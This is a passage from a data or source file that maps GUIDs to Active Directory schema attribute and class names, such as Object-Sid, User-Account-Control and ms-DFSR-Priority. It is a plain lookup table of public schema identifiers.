"bf967a45-0de6-11d0-a285-00aa003049e2": "System-Must-Contain",
"8ae70db5-6406-4196-92fe-f3bb557520a7": "ms-Imaging-Hash-Algorithm",
"da83fc4f-076f-4aea-b4dc-8f4dab9b5993": "ms-DS-Quota-Container",
"2a39c5b1-8960-11d1-aebc-0000f80367c1": "Certificate-Templates",
"bf9679ae-0de6-11d0-a285-00aa003049e2": "LSA-Modified-Count",
"eb20e7d6-32ad-42de-b141-16ad2631b01b": "ms-DFSR-Priority",
"9a7ad94b-ca53-11d1-bbd0-0080c76670c0": "Object-Classes",
"bf967a46-0de6-11d0-a285-00aa003049e2": "System-Only",
"3f78c3e5-f79a-46bd-a0b8-9d18116ddc79": "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity",
"e15334a3-0bf0-4427-b672-11f5d84acc92": "msSFU-30-Network-User",
"548e1c22-dea6-11d0-b010-0000f80367c1": "Class-Display-Name",
"bf9679af-0de6-11d0-a285-00aa003049e2": "Machine-Architecture",
"817cf0b8-db95-4914-b833-5a079ef65764": "ms-DFSR-DeletedPath",
"34aaa216-b699-11d0-afee-0000f80367c1": "Object-Count",
"bf967a47-0de6-11d0-a285-00aa003049e2": "System-Poss-Superiors",
"e362ed86-b728-0842-b27d-2dea7a9df218": "ms-DS-ManagedPassword",
"de91fc26-bd02-4b52-ae26-795999e96fc7": "ms-DS-Quota-Control",
"bf967938-0de6-11d0-a285-00aa003049e2": "Code-Page",
"c9b6358e-bb38-11d0-afef-0000f80367c1": "Machine-Password-Change-Interval",
"53ed9ad1-9975-41f4-83f5-0c061a12553a": "ms-DFSR-DeletedSizeInMb",
"bf9679e7-0de6-11d0-a285-00aa003049e2": "Object-Guid",
"bf967a49-0de6-11d0-a285-00aa003049e2": "Telephone-Number",
"0e78295a-c6d3-0a40-b491-d62251ffa0a6": "ms-DS-ManagedPasswordId",
"faf733d0-f8eb-4dcf-8d75-f1753af6a50b": "msSFU-30-NIS-Map-Config",
"bf96793b-0de6-11d0-a285-00aa003049e2": "COM-ClassID",
"bf9679b2-0de6-11d0-a285-00aa003049e2": "Machine-Role",
"5ac48021-e447-46e7-9d23-92c0c6a90dfb": "ms-DFSR-ReadOnly",
"bf9679e8-0de6-11d0-a285-00aa003049e2": "Object-Sid",
"bf967a4a-0de6-11d0-a285-00aa003049e2": "Teletex-Terminal-Identifier",
"d0d62131-2d4a-d04f-99d9-1c63646229a4": "ms-DS-ManagedPasswordPreviousId",
"ce206244-5827-4a86-ba1c-1c0c386c1b64": "ms-DS-Managed-Service-Account",
"281416d9-1968-11d0-a28f-00aa003049e2": "COM-CLSID",
"80a67e4f-9f22-11d0-afdd-00c04fd930c9": "Machine-Wide-Policy",
"db7a08e7-fc76-4569-a45f-f5ecb66a88b5": "ms-DFSR-CachePolicy",
"16775848-47f3-11d1-a9c3-0000f80367c1": "Object-Version",
"bf967a4b-0de6-11d0-a285-00aa003049e2": "Telex-Number",
"f8758ef7-ac76-8843-a2ee-a26b4dcaf409": "ms-DS-ManagedPasswordInterval",
"1cb81863-b822-4379-9ea2-5ff7bdc6386d": "ms-net-ieee-80211-GroupPolicy",
"bf96793c-0de6-11d0-a285-00aa003049e2": "COM-InterfaceID",
"0296c120-40da-11d1-a9c0-0000f80367c1": "Managed-By",
"4c5d607a-ce49-444a-9862-82a95f5d1fcc": "ms-DFSR-MinDurationCacheInMin",
"bf9679ea-0de6-11d0-a285-00aa003049e2": "OEM-Information",
"0296c121-40da-11d1-a9c0-0000f80367c1": "Telex-Primary",
"888eedd6-ce04-df40-b462-b8a50e41ba38": "ms-DS-GroupMSAMembership",
"281416dd-1968-11d0-a28f-00aa003049e2": "COM-Other-Prog-Id",
"0296c124-40da-11d1-a9c0-0000f80367c1": "Managed-Objects",
"2ab0e48d-ac4e-4afc-83e5-a34240db6198": "ms-DFSR-MaxAgeInCacheInMin",
"bf9679ec-0de6-11d0-a285-00aa003049e2": "OM-Object-Class",
"ed9de9a0-7041-11d2-9905-0000f87a57d4": "Template-Roots",
"55872b71-c4b2-3b48-ae51-4095f91ec600": "ms-DS-Transformation-Rules",
"99a03a6a-ab19-4446-9350-0cb878ed2d9b": "ms-net-ieee-8023-GroupPolicy",
"bf96793d-0de6-11d0-a285-00aa003049e2": "COM-ProgID",
"bf9679b5-0de6-11d0-a285-00aa003049e2": "Manager",
"43061ac1-c8ad-4ccc-b785-2bfac20fc60a": "ms-FVE-RecoveryPassword",
"bf9679ed-0de6-11d0-a285-00aa003049e2": "OM-Syntax",
"6db69a1c-9422-11d1-aebd-0000f80367c1": "Terminal-Server",
"86284c08-0c6e-1540-8b15-75147d23d20d": "ms-DS-Ingress-Claims-Transformation-Policy",
"fa85c591-197f-477e-83bd-ea5a43df2239": "ms-DFSR-LocalSettings",
"281416db-1968-11d0-a28f-00aa003049e2": "COM-Treat-As-Class-Id",
"bf9679b7-0de6-11d0-a285-00aa003049e2": "MAPI-ID",
"85e5a5cf-dcee-4075-9cfd-ac9db6a2f245": "ms-FVE-VolumeGuid",
"ddac0cf3-af8f-11d0-afeb-00c04fd930c9": "OMT-Guid",
"f0f8ffa7-1191-11d0-a060-00aa006c33ed": "Text-Country",
"c137427e-9a73-b040-9190-1b095bb43288": "ms-DS-Egress-Claims-Transformation-Policy",
"ea715d30-8f53-40d0-bd1e-6109186d782c": "ms-FVE-RecoveryInformation",
"281416de-1968-11d0-a28f-00aa003049e2": "COM-Typelib-Id",
"bf9679b9-0de6-11d0-a285-00aa003049e2": "Marshalled-Interface",
"1fd55ea8-88a7-47dc-8129-0daa97186a54": "ms-FVE-KeyPackage",
"1f0075fa-7e40-11d0-afd6-00c04fd930c9": "OMT-Indx-Guid",
"a8df7489-c5ea-11d1-bbcb-0080c76670c0": "Text-Encoded-OR-Address",
"d5006229-9913-2242-8b17-83761d1e0e5b": "ms-DS-TDO-Egress-BL",
"e11505d7-92c4-43e7-bf5c-295832ffc896": "ms-DFSR-Subscriber",
"281416da-1968-11d0-a28f-00aa003049e2": "COM-Unique-LIBID",
"e48e64e0-12c9-11d3-9102-00c04fd91ab1": "Mastered-By",
"f76909bc-e678-47a0-b0b3-f86a0044c06d": "ms-FVE-RecoveryGuid",
"3e978925-8c01-11d0-afda-00c04fd930c9": "Operating-System",
"ddac0cf1-af8f-11d0-afeb-00c04fd930c9": "Time-Refresh",
"5a5661a1-97c6-544b-8056-e430fe7bc554": "ms-DS-TDO-Ingress-BL",
"25173408-04ca-40e8-865e-3f9ce9bf1bd3": "ms-DFS-Deleted-Link-v2",
"bf96793e-0de6-11d0-a285-00aa003049e2": "Comment",
"bf9679bb-0de6-11d0-a285-00aa003049e2": "Max-Pwd-Age",
"aa4e1a6d-550d-4e05-8c35-4afcb917a9fe": "ms-TPM-OwnerInformation",
"bd951b3c-9c96-11d0-afdd-00c04fd930c9": "Operating-System-Hotfix",
"ddac0cf0-af8f-11d0-afeb-00c04fd930c9": "Time-Vol-Change",
"0bb49a10-536b-bc4d-a273-0bab0dd4bd10": "ms-DS-Transformation-Rules-Compiled",
"67212414-7bcc-4609-87e0-088dad8abdee": "ms-DFSR-Subscription",
"bf96793f-0de6-11d0-a285-00aa003049e2": "Common-Name",
"bf9679bc-0de6-11d0-a285-00aa003049e2": "Max-Renew-Age",
"0e0d0938-2658-4580-a9f6-7a0ac7b566cb": "ms-ieee-80211-Data",
"3e978927-8c01-11d0-afda-00c04fd930c9": "Operating-System-Service-Pack",
"bf967a55-0de6-11d0-a285-00aa003049e2": "Title",
"693f2006-5764-3d4a-8439-58f04aab4b59": "ms-DS-Applies-To-Resource-Types",
"7769fb7a-1159-4e96-9ccd-68bc487073eb": "ms-DFS-Link-v2",
"f0f8ff88-1191-11d0-a060-00aa006c33ed": "Company",
"bf9679bd-0de6-11d0-a285-00aa003049e2": "Max-Storage",
"6558b180-35da-4efe-beed-521f8f48cafb": "ms-ieee-80211-Data-Type",
"3e978926-8c01-11d0-afda-00c04fd930c9": "Operating-System-Version",
"16c3a860-1273-11d0-a060-00aa006c33ed": "Tombstone-Lifetime",
"24977c8c-c1b7-3340-b4f6-2b375eb711d7": "ms-DS-RID-Pool-Allocation-Enabled",
"7b35dbad-b3ec-486a-aad4-2fec9d6ea6f6": "ms-DFSR-GlobalSettings",
"bf967943-0de6-11d0-a285-00aa003049e2": "Content-Indexing-Allowed",
"bf9679be-0de6-11d0-a285-00aa003049e2": "Max-Ticket-Age",
"7f73ef75-14c9-4c23-81de-dd07a06f9e8b": "ms-ieee-80211-ID",
"bf9679ee-0de6-11d0-a285-00aa003049e2": "Operator-Count",
"c1dc867c-a261-11d1-b606-0000f80367c1": "Transport-Address-Attribute",
"9709eaaf-49da-4db2-908a-0446e5eab844": "ms-DS-cloudExtensionAttribute1",
"da73a085-6e64-4d61-b064-015d04164795": "ms-DFS-Namespace-Anchor",
"4d8601ee-ac85-11d0-afe3-00c04fd930c9": "Context-Menu",
"bf9679bf-0de6-11d0-a285-00aa003049e2": "May-Contain",
"8a5c99e9-2230-46eb-b8e8-e59d712eb9ee": "ms-IIS-FTP-Dir",
"963d274d-48be-11d1-a9c3-0000f80367c1": "Option-Description",
"26d97372-6070-11d1-a9c6-0000f80367c1": "Transport-DLL-Name",
"f34ee0ac-c0c1-4ba9-82c9-1a90752f16a5": "ms-DS-cloudExtensionAttribute2",
"1c332fe0-0c2a-4f32-afca-23c5e45a9e77": "ms-DFSR-ReplicationGroup",
"6da8a4fc-0e52-11d0-a286-00aa003049e2": "Control-Access-Rights",
"11b6cc8b-48c4-11d1-a9c3-0000f80367c1": "meetingAdvertiseScope",
"2a7827a4-1483-49a5-9d84-52e3812156b4": "ms-IIS-FTP-Root",
"19195a53-6da0-11d0-afd3-00c04fd930c9": "Options",
"26d97374-6070-11d1-a9c6-0000f80367c1": "Transport-Type",
"82f6c81a-fada-4a0d-b0f7-706d46838eb5": "ms-DS-cloudExtensionAttribute3",
"21cb8628-f3c3-4bbf-bff6-060b2d8f299a": "ms-DFS-Namespace-v2",
"bf967944-0de6-11d0-a285-00aa003049e2": "Cost",
"11b6cc83-48c4-11d1-a9c3-0000f80367c1": "meetingApplication",
"51583ce9-94fa-4b12-b990-304c35b18595": "ms-Imaging-PSP-Identifier",
"963d274e-48be-11d1-a9c3-0000f80367c1": "Options-Location",
"8fd044e3-771f-11d1-aeae-0000f80367c1": "Treat-As-Leaf",
"9cbf3437-4e6e-485b-b291-22b02554273f": "ms-DS-cloudExtensionAttribute4",
"64759b35-d3a1-42e4-b5f1-a3de162109b3": "ms-DFSR-Content",
"508ca374-a511-4e4e-9f4f-856f61a6b7e4": "Address-Book-Roots2",
"5fd42471-1262-11d0-a060-00aa006c33ed": "Country-Code",
"11b6cc92-48c4-11d1-a9c3-0000f80367c1": "meetingBandwidth",
"7b6760ae-d6ed-44a6-b6be-9de62c09ec67": "ms-Imaging-PSP-String",
"bf9679ef-0de6-11d0-a285-00aa003049e2": "Organization-Name",
"28630ebd-41d5-11d1-a9c1-0000f80367c1": "Tree-Name",
"2915e85b-e347-4852-aabb-22e5a651c864": "ms-DS-cloudExtensionAttribute5",
"4898f63d-4112-477c-8826-3ca00bd8277d": "Global-Address-List2",
"bf967945-0de6-11d0-a285-00aa003049e2": "Country-Name",
"11b6cc93-48c4-11d1-a9c3-0000f80367c1": "meetingBlob",
"35697062-1eaf-448b-ac1e-388e0be4fdee": "ms-net-ieee-80211-GP-PolicyGUID",
"bf9679f0-0de6-11d0-a285-00aa003049e2": "Organizational-Unit-Name",
"80a67e5a-9f22-11d0-afdd-00c04fd930c9": "Trust-Attributes",
"60452679-28e1-4bec-ace3-712833361456": "ms-DS-cloudExtensionAttribute6",
"4937f40d-a6dc-4d48-97ca-06e5fbfd3f16": "ms-DFSR-ContentSet",
"b1cba91a-0682-4362-a659-153e201ef069": "Template-Roots2",
"2b09958a-8931-11d1-aebc-0000f80367c1": "Create-Dialog",
"11b6cc87-48c4-11d1-a9c3-0000f80367c1": "meetingContactInfo",
"9c1495a5-4d76-468e-991e-1433b0a67855": "ms-net-ieee-80211-GP-PolicyData",
"28596019-7349-4d2f-adff-5a629961f942": "organizationalStatus",
"bf967a59-0de6-11d0-a285-00aa003049e2": "Trust-Auth-Incoming",
"4a7c1319-e34e-40c2-9d00-60ff7890f207": "ms-DS-cloudExtensionAttribute7",
"2df90d73-009f-11d2-aa4c-00c04fd7d83a": "Create-Time-Stamp",
"11b6cc7e-48c4-11d1-a9c3-0000f80367c1": "meetingDescription",
"0f69c62e-088e-4ff5-a53a-e923cec07c0a": "ms-net-ieee-80211-GP-PolicyReserved",
"5fd424ce-1262-11d0-a060-00aa006c33ed": "Original-Display-Table",
"bf967a5f-0de6-11d0-a285-00aa003049e2": "Trust-Auth-Outgoing",
"3cd1c514-8449-44ca-81c0-021781800d2a": "ms-DS-cloudExtensionAttribute8",
"04828aa9-6e42-4e80-b962-e2fe00754d17": "ms-DFSR-Topology",
"b8442f58-c490-4487-8a9d-d80b883271ad": "ms-DS-Claim-Type-Property-Base",
"2b09958b-8931-11d1-aebc-0000f80367c1": "Create-Wizard-Ext",
"11b6cc91-48c4-11d1-a9c3-0000f80367c1": "meetingEndTime",
"94a7b05a-b8b2-4f59-9c25-39e69baa1684": "ms-net-ieee-8023-GP-PolicyGUID",
"5fd424cf-1262-11d0-a060-00aa006c33ed": "Original-Display-Table-MSDOS",
"bf967a5c-0de6-11d0-a285-00aa003049e2": "Trust-Direction",
"0a63e12c-3040-4441-ae26-cd95af0d247e": "ms-DS-cloudExtensionAttribute9",
"bf967946-0de6-11d0-a285-00aa003049e2": "Creation-Time",
"11b6cc7c-48c4-11d1-a9c3-0000f80367c1": "meetingID",
"8398948b-7457-4d91-bd4d-8d7ed669c9f7": "ms-net-ieee-8023-GP-PolicyData",
"bf9679f1-0de6-11d0-a285-00aa003049e2": "Other-Login-Workstations",
"b000ea7a-a086-11d0-afdd-00c04fd930c9": "Trust-Parent",
"670afcb3-13bd-47fc-90b3-0a527ed81ab7": "ms-DS-cloudExtensionAttribute10",
"4229c897-c211-437c-a5ae-dbf705b696e5": "ms-DFSR-Member",
"36093235-c715-4821-ab6a-b56fb2805a58": "ms-DS-Claim-Types",
"4d8601ed-ac85-11d0-afe3-00c04fd930c9": "Creation-Wizard",
"11b6cc89-48c4-11d1-a9c3-0000f80367c1": "meetingIP",
"d3c527c7-2606-4deb-8cfd-18426feec8ce": "ms-net-ieee-8023-GP-PolicyReserved",
"0296c123-40da-11d1-a9c0-0000f80367c1": "Other-Mailbox",
"bf967a5d-0de6-11d0-a285-00aa003049e2": "Trust-Partner",
"9e9ebbc8-7da5-42a6-8925-244e12a56e24": "ms-DS-cloudExtensionAttribute11",
"7bfdcb85-4807-11d1-a9c3-0000f80367c1": "Creator",
"11b6cc8e-48c4-11d1-a9c3-0000f80367c1": "meetingIsEncrypted",
"3164c36a-ba26-468c-8bda-c1e5cc256728": "ms-PKI-Cert-Template-OID",
"bf9679f2-0de6-11d0-a285-00aa003049e2": "Other-Name",
"bf967a5e-0de6-11d0-a285-00aa003049e2": "Trust-Posix-Offset",
"3c01c43d-e10b-4fca-92b2-4cf615d5b09a": "ms-DS-cloudExtensionAttribute12",
"e58f972e-64b5-46ef-8d8b-bbc3e1897eab": "ms-DFSR-Connection",
"7a4a4584-b350-478f-acd6-b4b852d82cc0": "ms-DS-Resource-Properties",
"963d2737-48be-11d1-a9c3-0000f80367c1": "CRL-Object",
"11b6cc7f-48c4-11d1-a9c3-0000f80367c1": "meetingKeyword",
"dbd90548-aa37-4202-9966-8c537ba5ce32": "ms-PKI-Certificate-Application-Policy",
"1ea64e5d-ac0f-11d2-90df-00c04fd91ab1": "Other-Well-Known-Objects",
"bf967a60-0de6-11d0-a285-00aa003049e2": "Trust-Type",
"28be464b-ab90-4b79-a6b0-df437431d036": "ms-DS-cloudExtensionAttribute13",
"963d2731-48be-11d1-a9c3-0000f80367c1": "CRL-Partitioned-Revocation-List",
"11b6cc84-48c4-11d1-a9c3-0000f80367c1": "meetingLanguage",
"ea1dddc4-60ff-416e-8cc0-17cee534bce7": "ms-PKI-Certificate-Name-Flag",
"bf9679f3-0de6-11d0-a285-00aa003049e2": "Owner",
"bf967a61-0de6-11d0-a285-00aa003049e2": "UAS-Compat",
"cebcb6ba-6e80-4927-8560-98feca086a9f": "ms-DS-cloudExtensionAttribute14",
"7b9a2d92-b7eb-4382-9772-c3e0f9baaf94": "ms-ieee-80211-Policy",
"81a3857c-5469-4d8f-aae6-c27699762604": "ms-DS-Claim-Type",
"167757b2-47f3-11d1-a9c3-0000f80367c1": "Cross-Certificate-Pair",
"11b6cc80-48c4-11d1-a9c3-0000f80367c1": "meetingLocation",
"38942346-cc5b-424b-a7d8-6ffd12029c5f": "ms-PKI-Certificate-Policy",
"7d6c0e99-7e20-11d0-afd6-00c04fd930c9": "Package-Flags",
"0bb0fca0-1e89-429f-901a-1413894d9f59": "uid",
"aae4d537-8af0-4daa-9cc6-62eadb84ff03": "ms-DS-cloudExtensionAttribute15",
"1f0075fe-7e40-11d0-afd6-00c04fd930c9": "Curr-Machine-Id",
"11b6cc85-48c4-11d1-a9c3-0000f80367c1": "meetingMaxParticipants",
"b7ff5a38-0818-42b0-8110-d3d154c97f24": "ms-PKI-Credential-Roaming-Tokens",
"7d6c0e98-7e20-11d0-afd6-00c04fd930c9": "Package-Name",
"bf967a64-0de6-11d0-a285-00aa003049e2": "UNC-Name",
"9581215b-5196-4053-a11e-6ffcafc62c4d": "ms-DS-cloudExtensionAttribute16",
"a0ed2ac1-970c-4777-848e-ec63a0ec44fc": "ms-Imaging-PSPs",
"5b283d5e-8404-4195-9339-8450188c501a": "ms-DS-Resource-Property",
"1f0075fc-7e40-11d0-afd6-00c04fd930c9": "Current-Location",
"11b6cc7d-48c4-11d1-a9c3-0000f80367c1": "meetingName",
"d15ef7d8-f226-46db-ae79-b34e560bd12c": "ms-PKI-Enrollment-Flag",
"7d6c0e96-7e20-11d0-afd6-00c04fd930c9": "Package-Type",
"bf9679e1-0de6-11d0-a285-00aa003049e2": "Unicode-Pwd",
"3d3c6dda-6be8-4229-967e-2ff5bb93b4ce": "ms-DS-cloudExtensionAttribute17",
"963d273f-48be-11d1-a9c3-0000f80367c1": "Current-Parent-CA",
"11b6cc86-48c4-11d1-a9c3-0000f80367c1": "meetingOriginator",
"f22bd38f-a1d0-4832-8b28-0331438886a6": "ms-PKI-Enrollment-Servers",
"5245801b-ca6a-11d0-afff-0000f80367c1": "Parent-CA",
"ba0184c7-38c5-4bed-a526-75421470580c": "uniqueIdentifier",
"88e73b34-0aa6-4469-9842-6eb01b32a5b5": "ms-DS-cloudExtensionAttribute18",
"1f7c257c-b8a3-4525-82f8-11ccc7bee36e": "ms-Imaging-PostScanProcess",
"72e3d47a-b342-4d45-8f56-baff803cabf9": "ms-DS-Resource-Property-List",
"bf967947-0de6-11d0-a285-00aa003049e2": "Current-Value",
"11b6cc88-48c4-11d1-a9c3-0000f80367c1": "meetingOwner",
"e96a63f5-417f-46d3-be52-db7703c503df": "ms-PKI-Minimal-Key-Size",
"963d2733-48be-11d1-a9c3-0000f80367c1": "Parent-CA-Certificate-Chain",
"8f888726-f80a-44d7-b1ee-cb9df21392c8": "uniqueMember",
"0975fe99-9607-468a-8e18-c800d3387395": "ms-DS-cloudExtensionAttribute19",
"bf96799c-0de6-11d0-a285-00aa003049e2": "DBCS-Pwd",
"11b6cc81-48c4-11d1-a9c3-0000f80367c1": "meetingProtocol",
"8c9e1288-5028-4f4f-a704-76d026f246ef": "ms-PKI-OID-Attribute",
"2df90d74-009f-11d2-aa4c-00c04fd7d83a": "Parent-GUID",
"50950839-cc4c-4491-863a-fcf942d684b7": "unstructuredAddress",
"f5446328-8b6e-498d-95a8-211748d5acdc": "ms-DS-cloudExtensionAttribute20",
"a16f33c7-7fd6-4828-9364-435138fda08d": "ms-Print-ConnectionPolicy",
"b72f862b-bb25-4d5d-aa51-62c59bdf90ae": "ms-SPP-Activation-Objects-Container",
"bf967948-0de6-11d0-a285-00aa003049e2": "Default-Class-Store",
"11b6cc8d-48c4-11d1-a9c3-0000f80367c1": "meetingRating",
"5f49940e-a79f-4a51-bb6f-3d446a54dc6b": "ms-PKI-OID-CPS",
"28630ec0-41d5-11d1-a9c1-0000f80367c1": "Partial-Attribute-Deletion-List",
"9c8ef177-41cf-45c9-9673-7716c0c8901b": "unstructuredName",
"6b3d6fda-0893-43c4-89fb-1fb52a6616a9": "ms-DS-Issuer-Certificates",
"720bc4e2-a54a-11d0-afdf-00c04fd930c9": "Default-Group",
"11b6cc8f-48c4-11d1-a9c3-0000f80367c1": "meetingRecurrence",
"7d59a816-bb05-4a72-971f-5c1331f67559": "ms-PKI-OID-LocalizedName",
"19405b9e-3cfa-11d1-a9c0-0000f80367c1": "Partial-Attribute-Set",
"d9e18312-8939-11d1-aebc-0000f80367c1": "Upgrade-Product-Code",
"ca3286c2-1f64-4079-96bc-e62b610e730f": "ms-DS-Registration-Quota",
"37cfd85c-6719-4ad8-8f9e-8678ba627563": "ms-PKI-Enterprise-Oid",
"51a0e68c-0dc5-43ca-935d-c1c911bf2ee5": "ms-SPP-Activation-Object",
"b7b13116-b82e-11d0-afee-0000f80367c1": "Default-Hiding-Value",
"11b6cc8a-48c4-11d1-a9c3-0000f80367c1": "meetingScope",
"04c4da7a-e114-4e69-88de-e293f2d3b395": "ms-PKI-OID-User-Notice",
"07383084-91df-11d1-aebc-0000f80367c1": "Pek-Key-Change-Interval",
"032160bf-9824-11d1-aec0-0000f80367c1": "UPN-Suffixes",
"0a5caa39-05e6-49ca-b808-025b936610e7": "ms-DS-Maximum-Registration-Inactivity-Period",
"bf96799f-0de6-11d0-a285-00aa003049e2": "Default-Local-Policy-Object",
"11b6cc90-48c4-11d1-a9c3-0000f80367c1": "meetingStartTime",
"bab04ac2-0435-4709-9307-28380e7c7001": "ms-PKI-Private-Key-Flag",
"07383083-91df-11d1-aebc-0000f80367c1": "Pek-List",
"bf967a68-0de6-11d0-a285-00aa003049e2": "User-Account-Control",
"e3fb56c8-5de8-45f5-b1b1-d2b6cd31e762": "ms-DS-Device-Location",
"26ccf238-a08e-4b86-9a82-a8c9ac7ee5cb": "ms-PKI-Key-Recovery-Agent",
"e027a8bd-6456-45de-90a3-38593877ee74": "ms-TPM-Information-Objects-Container",
"26d97367-6070-11d1-a9c6-0000f80367c1": "Default-Object-Category",
"11b6cc82-48c4-11d1-a9c3-0000f80367c1": "meetingType",
"0cd8711f-0afc-4926-a4b1-09b08d3d436c": "ms-PKI-Site-Name",
"963d273c-48be-11d1-a9c3-0000f80367c1": "Pending-CA-Certificates",
"bf967a69-0de6-11d0-a285-00aa003049e2": "User-Cert",
"617626e9-01eb-42cf-991f-ce617982237e": "ms-DS-Registered-Owner",
"281416c8-1968-11d0-a28f-00aa003049e2": "Default-Priority",
"11b6cc8c-48c4-11d1-a9c3-0000f80367c1": "meetingURL",
"9de8ae7d-7a5b-421d-b5e4-061f79dfd5d7": "ms-PKI-Supersede-Templates",
"963d273e-48be-11d1-a9c3-0000f80367c1": "Pending-Parent-CA",
"bf967a6a-0de6-11d0-a285-00aa003049e2": "User-Comment",
"0449160c-5a8e-4fc8-b052-01c0f6e48f02": "ms-DS-Registered-Users",
"05f6c878-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLServer",
"85045b6a-47a6-4243-a7cc-6890701f662c": "ms-TPM-Information-Object",
"807a6d30-1669-11d0-a064-00aa006c33ed": "Default-Security-Descriptor",
"bf9679c0-0de6-11d0-a285-00aa003049e2": "Member",
"13f5236c-1884-46b1-b5d0-484e38990d58": "ms-PKI-Template-Minor-Revision",
"5fd424d3-1262-11d0-a060-00aa006c33ed": "Per-Msg-Dialog-Display-Table",
"bf967a6d-0de6-11d0-a285-00aa003049e2": "User-Parameters",
"a34f983b-84c6-4f0c-9050-a3a14a1d35a4": "ms-DS-Approximate-Last-Logon-Time-Stamp",
"167757b5-47f3-11d1-a9c3-0000f80367c1": "Delta-Revocation-List",
"0296c122-40da-11d1-a9c0-0000f80367c1": "MHS-OR-Address",
"0c15e9f5-491d-4594-918f-32813a091da9": "ms-PKI-Template-Schema-Version",
"5fd424d4-1262-11d0-a060-00aa006c33ed": "Per-Recip-Dialog-Display-Table",
"bf967a6e-0de6-11d0-a285-00aa003049e2": "User-Password",
"22a95c0e-1f83-4c82-94ce-bea688cfc871": "ms-DS-Is-Enabled",
"0c7e18ea-ccef-11d2-9993-0000f87a57d4": "MS-SQL-OLAPServer",
"ef2fc3ed-6e18-415b-99e4-3114a8cb124b": "ms-DNS-Server-Settings",
"bf96794f-0de6-11d0-a285-00aa003049e2": "Department",
"bf9679c2-0de6-11d0-a285-00aa003049e2": "Min-Pwd-Age",
"3c91fbbf-4773-4ccd-a87b-85d53e7bcf6a": "ms-PKI-RA-Application-Policies",
"16775858-47f3-11d1-a9c3-0000f80367c1": "Personal-Title",
"11732a8a-e14d-4cc5-b92f-d93f51c6d8e4": "userClass",
"100e454d-f3bb-4dcb-845f-8d5edc471c59": "ms-DS-Device-OS-Type",
"be9ef6ee-cbc7-4f22-b27b-96967e7ee585": "departmentNumber",
"bf9679c3-0de6-11d0-a285-00aa003049e2": "Min-Pwd-Length",
"d546ae22-0951-4d47-817e-1c9f96faad46": "ms-PKI-RA-Policies",
"0296c11d-40da-11d1-a9c0-0000f80367c1": "Phone-Fax-Other",
"23998ab5-70f8-4007-a4c1-a84a38311f9a": "userPKCS12",
"70fb8c63-5fab-4504-ab9d-14b329a8a7f8": "ms-DS-Device-OS-Version",
"11d43c5c-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLRepository",
"555c21c3-a136-455a-9397-796bbd358e25": "ms-Authz-Central-Access-Policies",
"bf967950-0de6-11d0-a285-00aa003049e2": "Description",
"bf9679c4-0de6-11d0-a285-00aa003049e2": "Min-Ticket-Age",
"fe17e04b-937d-4f7e-8e0e-9292c8d5683e": "ms-PKI-RA-Signature",
"f0f8ffa2-1191-11d0-a060-00aa006c33ed": "Phone-Home-Other",
"28630ebb-41d5-11d1-a9c1-0000f80367c1": "User-Principal-Name",
"90615414-a2a0-4447-a993-53409599b74e": "ms-DS-Device-Physical-IDs",
"eea65906-8ac6-11d0-afda-00c04fd930c9": "Desktop-Profile",
"bf9679c5-0de6-11d0-a285-00aa003049e2": "Modified-Count",
"6617e4ac-a2f1-43ab-b60c-11fbd1facf05": "ms-PKI-RoamingTimeStamp",
"f0f8ffa1-1191-11d0-a060-00aa006c33ed": "Phone-Home-Primary",
"9a9a021f-4a5b-11d1-a9c3-0000f80367c1": "User-Shared-Folder",
"c30181c7-6342-41fb-b279-f7c566cbe0a7": "ms-DS-Device-ID",
"17c2f64e-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLPublication",
"99bb1b7a-606d-4f8b-800e-e15be554ca8d": "ms-Authz-Central-Access-Rules",
"974c9a02-33fc-11d3-aa6e-00c04f8eedd8": "msExch-Proxy-Gen-Options",
"bf967951-0de6-11d0-a285-00aa003049e2": "Destination-Indicator",
"bf9679c6-0de6-11d0-a285-00aa003049e2": "Modified-Count-At-Last-Prom",
"b3f93023-9239-4f7c-b99c-6745d87adbc2": "ms-PKI-DPAPIMasterKeys",
"4d146e4b-48d4-11d1-a9c3-0000f80367c1": "Phone-Ip-Other",
"9a9a0220-4a5b-11d1-a9c3-0000f80367c1": "User-Shared-Folder-Other",
"ef65695a-f179-4e6a-93de-b01e06681cfb": "ms-DS-Device-Object-Version",
"963d2750-48be-11d1-a9c3-0000f80367c1": "dhcp-Classes",
"9a7ad94a-ca53-11d1-bbd0-0080c76670c0": "Modify-Time-Stamp",
"b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7": "ms-PKI-AccountCredentials",
"4d146e4a-48d4-11d1-a9c3-0000f80367c1": "Phone-Ip-Primary",
"e16a9db2-403c-11d1-a9c0-0000f80367c1": "User-SMIME-Certificate",
"862166b6-c941-4727-9565-48bfff2941de": "ms-DS-Is-Member-Of-DL-Transitive",
"1d08694a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLDatabase",
"5b4a06dc-251c-4edb-8813-0bdd71327226": "ms-Authz-Central-Access-Rule",
"963d2741-48be-11d1-a9c3-0000f80367c1": "dhcp-Flags",
"bf9679c7-0de6-11d0-a285-00aa003049e2": "Moniker",
"f39b98ad-938d-11d1-aebd-0000f80367c1": "ms-RRAS-Attribute",
"0296c11f-40da-11d1-a9c0-0000f80367c1": "Phone-ISDN-Primary",
"bf9679d7-0de6-11d0-a285-00aa003049e2": "User-Workstations",
"e215395b-9104-44d9-b894-399ec9e21dfc": "ms-DS-Member-Transitive",
"963d2742-48be-11d1-a9c3-0000f80367c1": "dhcp-Identification",
"bf9679c8-0de6-11d0-a285-00aa003049e2": "Moniker-Display-Name",
"f39b98ac-938d-11d1-aebd-0000f80367c1": "ms-RRAS-Vendor-Attribute-Entry",
"0296c11e-40da-11d1-a9c0-0000f80367c1": "Phone-Mobile-Other",
"bf967a6f-0de6-11d0-a285-00aa003049e2": "USN-Changed",
"b918fe7d-971a-f404-9e21-9261abec970b": "ms-DS-Parent-Dist-Name",
"20af031a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-OLAPDatabase",
"a5679cb0-6f9d-432c-8b75-1e3e834f02aa": "ms-Authz-Central-Access-Policy",
"963d2747-48be-11d1-a9c3-0000f80367c1": "dhcp-Mask",
"1f2ac2c8-3b71-11d2-90cc-00c04fd91ab1": "Move-Tree-State",
"a6f24a23-d65c-4d65-a64f-35fb6873c2b9": "ms-RADIUS-FramedInterfaceId",
"f0f8ffa3-1191-11d0-a060-00aa006c33ed": "Phone-Mobile-Primary",
